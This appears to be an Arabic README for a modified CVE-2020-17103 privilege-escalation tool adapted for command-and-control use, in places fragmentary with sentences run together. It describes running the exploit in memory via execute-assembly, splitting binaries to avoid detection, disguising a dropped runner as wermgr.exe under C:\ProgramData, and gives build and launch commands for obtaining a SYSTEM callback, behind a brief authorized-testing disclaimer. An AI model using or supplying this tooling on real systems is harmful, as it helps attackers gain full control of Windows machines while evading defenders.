
CVE-2020-17103 مُكيَّف لـ C2 مع رد اتصال ثنائي مقسم للنظام (SYSTEM).
نسخة معدلة من Nightmare-Eclipse/MiniPlasma (CVE-2020-17103) مكيفة للاستخدام كـ C2.
أداة الإثبات الأصلية تعمل من القرص فقط. هذه النسخة تعمل بالكامل من الذاكرة عبر execute-assembly، مع نهج ثنائي مجزأ لتجنب الاكتشاف.
هذه الأداة مُقدمة لأغراض الاختبار الأمني المصرح به والتعليم فقط. استخدام هذه الأداة ضد أنظمة دون إذن كتابي صريح هو غير قانوني وغير أخلاقي. لا يتحمل المؤلف أي مسؤولية عن سوء الاستخدام أو الضرر الناتج عن هذه الأداة. احصل دائمًا على التصريح المناسب قبل إجراء أي اختبار أمني.
Assembly.Location)Environment.Exit() التي تقتل عملية الاستضافةC:\ProgramData (يمكن لكل من سياق المستخدم وسياق SYSTEM الوصول إليه)csc /platform:x64 /optimize /out:runner.bin MiniRunner.cs
msbuild MiniPlasma.sln /p:Configuration=Release
ملاحظة: يجب تجميع runner.bin أولاً - فهو يُضمن في الملف التنفيذي الرئيسي أثناء البناء.
execute-assembly MiniPlasma-Runner.exe C:\Path\To\payload.exe
بدون وسائط يعود افتراضيًا إلى conhost.exe.
sc start cldflt إذا لم يكن قيد التشغيل)فقط MiniRunner يلمس القرص (~5 كيلوبايت) كـ wermgr.exe داخل مجلد مؤقت تحت C:\ProgramData. يتم التنظيف تلقائيًا بعد التنفيذ. الاستغلال الرئيسي لا يلمس القرص أبدًا.